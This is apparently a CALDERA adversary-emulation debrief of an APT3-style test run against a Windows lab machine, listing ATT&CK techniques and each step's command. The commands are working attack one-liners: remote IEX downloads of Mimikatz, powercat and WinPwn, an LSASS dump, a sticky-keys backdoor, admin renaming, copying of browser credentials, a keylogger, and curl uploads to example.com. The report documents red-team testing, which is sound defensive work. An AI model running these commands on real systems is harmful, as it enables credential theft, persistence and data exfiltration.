Caldera APT3

Uploaded by dekaya4025

OPERATIONS DEBRIEF

Generated on 2024-04-06T00:00:32Z

This document covers the overall campaign analytics made up of the selected set of operations. The
sections below contain general metadata about the selected operations as well as graphical views of
the operations, the techniques and tactics used, and the facts discovered by the operations. The
following sections include a more in-depth review of each specific operation run.

STATISTICS
An operation's planner makes up the decision-making process: it contains the logic for how a running
operation decides which abilities to use and in what order. An objective is a collection of fact targets,
called goals, which can be tied to adversaries. Every time the planner is evaluated during an operation,
the current objective status is evaluated against the operation's current knowledge, and the operation
completes once all goals are met.

Name               State    Planner  Objective  Time
Windows-Test-APT3  running  atomic   default    Not finished

AGENTS
The table below displays information about the agents used. An agent's paw is the unique identifier, or
paw print, of an agent. Also included are the username of the user who executed the agent, the
privilege level of the agent process, and the name of the agent executable.

Paw     Host         Platform  Username            Privilege  Executable
mmsgnd  caldera      linux     root                Elevated   splunkd
ttjjvq  MSEDGEWIN10  windows   MSEDGEWIN10\IEUser  Elevated   caldera.exe
qzuqdy  caldera      linux     root                Elevated   splunkd
awedjc  MSEDGEWIN10  windows   MSEDGEWIN10\IEUser  Elevated   caldera.exe


ATTACK PATH GRAPH


This graph displays the attack path of hosts compromised by CALDERA. Source and target hosts are
connected by the method of execution used to start the agent on the target host.
[Attack path graph not reproduced in this text version. Legend: server, windows. Nodes: C2 Server; MSEDGEWIN10$MSEDGEWIN10\IEUser.]

STEPS GRAPH
This is a graphical display of the agents connected to the command and control (C2), the operations
run, and the steps of each operation as they relate to the agents.

[Steps graph not reproduced in this text version. Legend: server, windows, operation, and the tactics discovery, multiple, collection, credential-access, execution, persistence, exfiltration, defense-evasion, command-and-control, initial-access, lateral-movement. Nodes: C2 Server; MSEDGEWIN10$MSEDGEWIN10\IEUser; operation Windows-Test-APT3.]


TACTIC GRAPH
This graph displays the order of tactics executed by the operation. A tactic explains the general
purpose or the "why" of a step.
[Tactic graph not reproduced in this text version. Legend: operation; tactic. Nodes: operation Windows-Test-APT3 and the tactics defense-evasion, command-and-control, discovery, credential-access, lateral-movement, collection, exfiltration, initial-access, execution, persistence and multiple.]

TECHNIQUE GRAPH
This graph displays the order of techniques executed by the operation. A technique explains the
technical method or the "how" of a step.
[Technique graph not reproduced in this text version. Legend: operation; technique_name. Nodes: operation Windows-Test-APT3 and the techniques listed in the TACTICS AND TECHNIQUES section below.]


FACT GRAPH
This graph displays the facts discovered by the operations run. Facts are attached to the operation
where they were discovered. Facts are also attached to the facts that led to their discovery. For
readability, only the first 15 facts discovered in an operation are included in the graph.
[Fact graph not reproduced in this text version. Legend: operation; fact. Nodes: operation Windows-Test-APT3 and facts with the traits host.ip.address, file.sensitive.extension, server.malicious.url and host.file.path.]


TACTICS AND TECHNIQUES


Tactics / Techniques / Abilities (all abilities belong to operation Windows-Test-APT3)

Collection
  Techniques:
    T1560.001: Archive Collected Data: Archive via Utility
    T1005: Data from Local System
  Abilities:
    Compress Data and lock with password for Exfiltration with winrar
    Search files of interest and save them to a single zip file (Windows)

Command-and-control
  Techniques:
    T1105: Ingress Tool Transfer
    T1095: Non-Application Layer Protocol
  Abilities:
    Curl Upload File
    Powercat C2

Credential-access
  Techniques:
    T1110.002: Brute Force: Password Cracking
    T1555.003: Credentials from Password Stores: Credentials from Web Browsers
    T1003.001: OS Credential Dumping: LSASS Memory
    T1552.001: Unsecured Credentials: Credentials In Files
  Abilities:
    Password Cracking with Hashcat
    Simulating access to Windows Edge Login Data
    Create Mini Dump of LSASS.exe using ProcDump
    WinPwn - passhunt

Defense-evasion
  Techniques:
    T1564.003: Hide Artifacts: Hidden Window
    T1070.004: Indicator Removal on Host: File Deletion
    T1027: Obfuscated Files or Information
    T1218.011: Signed Binary Proxy Execution: Rundll32
  Abilities:
    Hidden Window
    Delete a single file - Windows PowerShell
    Obfuscated Command in PowerShell
    Rundll32 with Control_RunDLL

Discovery
  Techniques:
    T1087.001: Account Discovery: Local Account
    T1083: File and Directory Discovery
    T1069.001: Permission Groups Discovery: Local Groups
    T1057: Process Discovery
    T1018: Remote System Discovery
    T1082: System Information Discovery
    T1016: System Network Configuration Discovery
    T1049: System Network Connections Discovery
    T1033: System Owner/User Discovery
  Abilities:
    Enumerate all accounts via PowerShell (Local)
    File and Directory Discovery (cmd.exe)
    Permission Groups Discovery
    Process Discovery - Get-Process
    Remote System Discovery - arp
    System Information Discovery
    System Network Configuration Discovery on Windows
    System Network Connections Discovery
    Current User

Execution
  Techniques:
    T1059.001: Command and Scripting Interpreter: PowerShell
    T1059.003: Command and Scripting Interpreter: Windows Command Shell
  Abilities:
    Mimikatz
    Suspicious Execution via Windows Command Shell

Exfiltration
  Techniques:
    T1041: Exfiltration Over C2 Channel
  Abilities:
    C2 Data Exfiltration

Initial-access
  Techniques:
    T1566.001: Phishing: Spearphishing Attachment
  Abilities:
    Word spawned a command shell and used an IP address in the command line

Lateral-movement
  Techniques:
    T1021.001: Remote Services: Remote Desktop Protocol
    T1021.002: Remote Services: SMB/Windows Admin Shares
  Abilities:
    Changing RDP Port to Non Standard Port via Command_Prompt
    Execute command writing output to local Admin Share

Multiple
  Techniques:
    T1098: Account Manipulation
    T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    T1543.003: Create or Modify System Process: Windows Service
    T1546.008: Event Triggered Execution: Accessibility Features
    T1574.002: Hijack Execution Flow: DLL Side-Loading
    T1056.001: Input Capture: Keylogging
    T1053.005: Scheduled Task/Job: Scheduled Task
  Abilities:
    Admin Account Manipulate
    Add Executable Shortcut Link to User Startup Folder
    Modify Fax service to run PowerShell
    Replace binary of sticky keys
    DLL Side-Loading using the dotnet startup hook environment variable
    Input Capture
    Scheduled Task Startup Script

Persistence
  Techniques:
    T1136.001: Create Account: Local Account
  Abilities:
    Create a new user in a command prompt

STEPS IN OPERATION WINDOWS-TEST-APT3


The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts.

Columns: Time, Status, Agent, Name, Command, Facts

Step: Enumerate all accounts via PowerShell (Local)
  Time: 2024-04-05T16:30:01Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: net user; get-localuser; get-localgroupmember -group Users; cmdkey.exe /list; ls C:/Users; get-childitem C:\Users\; dir C:\Users\; get-localgroup; net localgroup

Step: Admin Account Manipulate
  Time: 2024-04-05T16:31:06Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: $x = Get-Random -Minimum 2 -Maximum 9999; $y = Get-Random -Minimum 2 -Maximum 9999; $z = Get-Random -Minimum 2 -Maximum 9999; $w = Get-Random -Minimum 2 -Maximum 9999; Write-Host HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name; foreach($member in $fmm) {; if($member -like "*Administrator*") {; $account = $member.Name.Split("\")[-1]; $originalDescription = (Get-LocalUser -Name $account).Description; Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48); Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z"; Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME; }; }

Step: Compress Data and lock with password for Exfiltration with winrar
  Time: 2024-04-05T16:31:48Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: if not exist "%programfiles%/WinRAR/Rar.exe" ( call ) ELSE ( echo Downloading Winrar installer && bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" %TEMP%\winrar.exe && %TEMP%\winrar.exe /S ) && && mkdir .\tmp\victim-files && cd .\tmp\victim-files && echo "This file will be encrypted" > .\encrypted_file.txt && "%programfiles%/WinRAR/Rar.exe" a -hp"blue" hello.rar && dir

Step: Add Executable Shortcut Link to User Startup Folder
  Time: 2024-04-05T16:32:54Z   Status: success   Agent: ttjjvq   Facts: No
  Command: $Target = "C:\Windows\System32\calc.exe"; $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"; $WScriptShell = New-Object -ComObject WScript.Shell; $Create = $WScriptShell.CreateShortcut($ShortcutLocation); $Create.TargetPath = $Target; $Create.Save()

Step: Password Cracking with Hashcat
  Time: 2024-04-05T16:33:39Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: cd PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe\.. && PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule c5068b_sam.txt cab59f_password.lst

Step: Mimikatz
  Time: 2024-04-05T16:34:49Z   Status: success   Agent: ttjjvq   Facts: Yes
  Command: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Step: Suspicious Execution via Windows Command Shell
  Time: 2024-04-05T16:35:22Z   Status: success   Agent: ttjjvq   Facts: No
  Command: %LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt

Step: Create a new user in a command prompt
  Time: 2024-04-05T16:36:08Z   Status: success   Agent: ttjjvq   Facts: No
  Command: net user /add "T1136.001_CMD" "T1136.001_CMD!"

Step: Modify Fax service to run PowerShell
  Time: 2024-04-05T16:36:47Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" && sc start Fax

Step: Simulating access to Windows Edge Login Data
  Time: 2024-04-05T16:37:56Z   Status: success   Agent: ttjjvq   Facts: No
  Command: Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -Recurse

Step: Search files of interest and save them to a single zip file (Windows)
  Time: 2024-04-05T16:38:49Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: $startingDirectory = "C:\Users"; $outputZip = "PathToAtomicsFolder\..\ExternalPayloads\T1005"; $fileExtensionsString = ".doc, .docx, .txt" ; $fileExtensions = $fileExtensionsString -split ", "; New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null; Function Search-Files {; param (; [string]$directory; ); $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {; $fileExtensions -contains $_.Extension.ToLower(); }; return $files; }; $foundFiles = Search-Files -directory $startingDirectory; if ($foundFiles.Count -gt 0) {; $foundFilePaths = $foundFiles.FullName; Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"; Write-Host "Zip file created: $outputZip\data.zip"; } else {; Write-Host "No files found with the specified extensions."; }

Step: Replace binary of sticky keys
  Time: 2024-04-05T16:39:28Z   Status: success   Agent: ttjjvq   Facts: No
  Command: IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd ) && takeown /F C:\Windows\System32\sethc.exe /A && icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t && copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Step: C2 Data Exfiltration
  Time: 2024-04-05T16:40:43Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: if(-not (Test-Path $env:TEMP\LineNumbers.txt)){ ; 1..100 | ForEach-Object { Add-Content -Path $env:TEMP\LineNumbers.txt -Value "This is line $_." }; }; [System.Net.ServicePointManager]::Expect100Continue = $false; $filecontent = Get-Content -Path $env:TEMP\LineNumbers.txt; Invoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive

Step: File and Directory Discovery (cmd.exe)
  Time: 2024-04-05T16:42:07Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: dir /s c:\ >> %temp%\T1083Test1.txt && dir /s "c:\Documents and Settings" >> %temp%\T1083Test1.txt && dir /s "c:\Program Files\" >> %temp%\T1083Test1.txt && dir "%systemdrive%\Users\*.*" >> %temp%\T1083Test1.txt && dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\T1083Test1.txt && dir "%userprofile%\Desktop\*.*" >> %temp%\T1083Test1.txt && tree /F >> %temp%\T1083Test1.txt

Step: Hidden Window
  Time: 2024-04-05T16:42:30Z   Status: success   Agent: ttjjvq   Facts: No
  Command: Start-Process powershell.exe -WindowStyle hidden calc.exe

Step: DLL Side-Loading using the dotnet startup hook environment variable
  Time: 2024-04-05T16:43:19Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: set DOTNET_STARTUP_HOOKS="80410d_preloader.dll" && dotnet -h > nul && echo.

Step: Delete a single file - Windows PowerShell
  Time: 2024-04-05T16:44:19Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: Remove-Item -path $env:TEMP\deleteme_T1551.004

Step: Curl Upload File
  Time: 2024-04-05T16:44:52Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com && C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com && C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com && C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com

Step: Input Capture
  Time: 2024-04-05T16:45:36Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: if (Test-Path "PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1") { ; } else {New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1") -Force | Out-Null; Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1 -OutFile "PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1"}; ; &"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath $env:TEMP\key.log

Step: Powercat C2
  Time: 2024-04-05T16:46:43Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1'); powercat -c

Step: Obfuscated Command in PowerShell
  Time: 2024-04-05T16:47:15Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

Step: Create Mini Dump of LSASS.exe using ProcDump
  Time: 2024-04-05T16:48:02Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe" -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp

Step: Permission Groups Discovery
  Time: 2024-04-05T16:49:34Z   Status: success   Agent: ttjjvq   Facts: No
  Command: gpresult /R

Step: Word spawned a command shell and used an IP address in the command line
  Time: 2024-04-05T16:50:23Z   Status: success   Agent: ttjjvq   Facts: No
  Command: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing); $macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"; Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"

Step: Process Discovery - Get-Process
  Time: 2024-04-05T16:51:13Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: Get-Process

Step: Changing RDP Port to Non Standard Port via Command_Prompt
  Time: 2024-04-05T16:52:05Z   Status: success   Agent: ttjjvq   Facts: No
  Command: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 4489 /f && netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=4489

Step: Execute command writing output to local Admin Share
  Time: 2024-04-05T16:52:44Z   Status: success   Agent: ttjjvq   Facts: No
  Command: cmd.exe /Q /c hostname 1> \\127.0.0.1\ADMIN$\output.txt 2>&1

Step: Remote System Discovery - arp
  Time: 2024-04-05T16:53:44Z   Status: success   Agent: ttjjvq   Facts: Yes
  Command: arp -a

Step: Scheduled Task Startup Script
  Time: 2024-04-05T16:54:33Z   Status: success   Agent: ttjjvq   Facts: No
  Command: schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" && schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

Step: Rundll32 with Control_RunDLL
  Time: 2024-04-05T16:55:14Z   Status: success   Agent: ttjjvq   Facts: No
  Command: rundll32.exe shell32.dll,Control_RunDLL "6349c0_calc.dll"

Step: System Information Discovery
  Time: 2024-04-05T16:56:19Z   Status: success   Agent: ttjjvq   Facts: Yes
  Command: systeminfo && reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

Step: System Network Configuration Discovery on Windows
  Time: 2024-04-05T16:56:51Z   Status: success   Agent: ttjjvq   Facts: Yes
  Command: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config

Step: System Network Connections Discovery
  Time: 2024-04-05T16:58:29Z   Status: timeout   Agent: ttjjvq   Facts: Yes
  Command: netstat && net use && net sessions

Step: Current User
  Time: 2024-04-05T16:59:07Z   Status: success   Agent: ttjjvq   Facts: No
  Command: whoami

Step: WinPwn - passhunt
  Time: 2024-04-05T17:01:11Z   Status: failure   Agent: ttjjvq   Facts: No
  Command: $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'; iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1'); passhunt -local $true -noninteractive

Step: Enumerate all accounts via PowerShell (Local)
  Time: 2024-04-05T23:39:52Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: net user; get-localuser; get-localgroupmember -group Users; cmdkey.exe /list; ls C:/Users; get-childitem C:\Users\; dir C:\Users\; get-localgroup; net localgroup

Step: Admin Account Manipulate
  Time: 2024-04-05T23:40:33Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: $x = Get-Random -Minimum 2 -Maximum 9999; $y = Get-Random -Minimum 2 -Maximum 9999; $z = Get-Random -Minimum 2 -Maximum 9999; $w = Get-Random -Minimum 2 -Maximum 9999; Write-Host HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name; foreach($member in $fmm) {; if($member -like "*Administrator*") {; $account = $member.Name.Split("\")[-1]; $originalDescription = (Get-LocalUser -Name $account).Description; Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48); Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z"; Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME; }; }

Step: Compress Data and lock with password for Exfiltration with winrar
  Time: 2024-04-05T23:41:24Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: if not exist "%programfiles%/WinRAR/Rar.exe" ( call ) ELSE ( echo Downloading Winrar installer && bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" %TEMP%\winrar.exe && %TEMP%\winrar.exe /S ) && && mkdir .\tmp\victim-files && cd .\tmp\victim-files && echo "This file will be encrypted" > .\encrypted_file.txt && "%programfiles%/WinRAR/Rar.exe" a -hp"blue" hello.rar && dir

Step: Add Executable Shortcut Link to User Startup Folder
  Time: 2024-04-05T23:42:18Z   Status: success   Agent: sbyzsg   Facts: No
  Command: $Target = "C:\Windows\System32\calc.exe"; $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"; $WScriptShell = New-Object -ComObject WScript.Shell; $Create = $WScriptShell.CreateShortcut($ShortcutLocation); $Create.TargetPath = $Target; $Create.Save()

Step: Password Cracking with Hashcat
  Time: 2024-04-05T23:42:55Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: cd PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe\.. && PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule c5068b_sam.txt cab59f_password.lst

Step: Mimikatz
  Time: 2024-04-05T23:44:01Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Step: Suspicious Execution via Windows Command Shell
  Time: 2024-04-05T23:45:00Z   Status: success   Agent: sbyzsg   Facts: No
  Command: %LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt

Step: Create a new user in a command prompt
  Time: 2024-04-05T23:45:50Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: net user /add "T1136.001_CMD" "T1136.001_CMD!"

Step: Modify Fax service to run PowerShell
  Time: 2024-04-05T23:46:49Z   Status: failure   Agent: sbyzsg   Facts: No
  Command: sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" && sc start Fax

Step: Simulating access to Windows Edge Login Data
  Time: 2024-04-05T23:48:43Z   Status: success   Agent: sbyzsg   Facts: No
  Command: Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -Recurse

Step: Simulating access to Windows Edge Login Data
  Time: 2024-04-05T23:48:43Z   Status: success   Agent: sbyzsg   Facts: No
  Command: Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -Recurse

Step: Simulating access to Windows Edge Login Data
  Time: 2024-04-05T23:48:46Z   Status: success   Agent: sbyzsg   Facts: No
  Command: Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -Recurse

Step: Search files of interest and save them to a single zip file (Windows)
  Time: -   Status: collected   Agent: sbyzsg   Facts: No
  Command: $startingDirectory = "C:\Users"; $outputZip = "PathToAtomicsFolder\..\ExternalPayloads\T1005"; $fileExtensionsString = ".doc, .docx, .txt" ; $fileExtensions = $fileExtensionsString -split ", "; New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null; Function Search-Files {; param (; [string]$directory; ); $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {; $fileExtensions -contains $_.Extension.ToLower(); }; return $files; }; $foundFiles = Search-Files -directory $startingDirectory; if ($foundFiles.Count -gt 0) {; $foundFilePaths = $foundFiles.FullName; Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"; Write-Host "Zip file created: $outputZip\data.zip"; } else {; Write-Host "No files found with the specified extensions."; }

Step: Search files of interest and save them to a single zip file (Windows)
  Time: -   Status: collected   Agent: sbyzsg   Facts: No
  Command: $startingDirectory = "C:\Users"; $outputZip = "PathToAtomicsFolder\..\ExternalPayloads\T1005"; $fileExtensionsString = ".doc, .docx, .txt" ; $fileExtensions = $fileExtensionsString -split ", "; New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null; Function Search-Files {; param (; [string]$directory; ); $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {; $fileExtensions -contains $_.Extension.ToLower(); }; return $files; }; $foundFiles = Search-Files -directory $startingDirectory; if ($foundFiles.Count -gt 0) {; $foundFilePaths = $foundFiles.FullName; Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"; Write-Host "Zip file created: $outputZip\data.zip"; } else {; Write-Host "No files found with the specified extensions."; }

FACTS FOUND IN OPERATION WINDOWS-TEST-APT3


The table below displays the facts found in the operation, the command run and the agent that found
the fact. Every fact, by default, gets a score of 1. If a host.user.password fact is important or has a high
chance of success if used, you may assign it a score of 5. When an ability uses a fact to fill in a
variable, it uses the facts with the highest scores first. A fact with a score of 0 is blacklisted, meaning it
cannot be used in an operation.

Columns: Trait, Value, Score, Source, Command Run

Trait: file.sensitive.extension   Value: wav   Score: 1   Source: ed3..96b
  Command Run: No Command (SEEDED)

Trait: file.sensitive.extension   Value: yml   Score: 3   Source: ed3..96b
  Command Run: No Command (SEEDED)

Trait: file.sensitive.extension   Value: png   Score: 16   Source: ed3..96b
  Command Run: No Command (SEEDED)

Trait: server.malicious.url   Value: keyloggedsite.com   Score: 1   Source: ed3..96b
  Command Run: No Command (SEEDED)

Trait: host.file.path   Value: / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected]   Score: 1   Source: ttjjvq
  Command Run: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Trait: host.file.path   Value: / ## > http://blog.gentilkiwi.com/mimikatz   Score: 1   Source: ttjjvq
  Command Run: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Trait: host.file.path   Value: //pingcastle.com   Score: 1   Source: ttjjvq
  Command Run: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Trait: host.file.path   Value: / http://mysmartlogon.com   Score: 1   Source: ttjjvq
  Command Run: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Trait: host.ip.address   Value: 172.16.135.128   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: systeminfo && reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
  Command Run: arp -a
  Command Run: netstat && net use && net sessions

Trait: host.ip.address   Value: 172.16.135.2   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: arp -a

Trait: host.ip.address   Value: 224.0.0.22   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: arp -a

Trait: host.ip.address   Value: 224.0.0.251   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: arp -a

Trait: host.ip.address   Value: 224.0.0.252   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: arp -a

Trait: host.ip.address   Value: 239.255.255.250   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: arp -a

Trait: host.ip.address   Value: 255.255.255.255   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: arp -a

Trait: host.file.path   Value: C:\pagefile.sys   Score: 1   Source: ttjjvq
  Command Run: systeminfo && reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

Trait: host.ip.address   Value: 172.16.135.254   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
  Command Run: systeminfo && reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

Trait: host.ip.address   Value: 255.255.255.0   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config

Trait: host.ip.address   Value: 172.16.135.255   Score: 1   Source: ttjjvq
  Command Run: ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config

Trait: host.ip.address   Value: 192.229.211.108   Score: 1   Source: ttjjvq
  Command Run: netstat && net use && net sessions

Trait: host.ip.address   Value: 192.168.0.193   Score: 1   Source: ttjjvq
  Command Run: netstat && net use && net sessions

Trait: host.ip.address   Value: 20.10.31.115   Score: 1   Source: ttjjvq
  Command Run: netstat && net use && net sessions
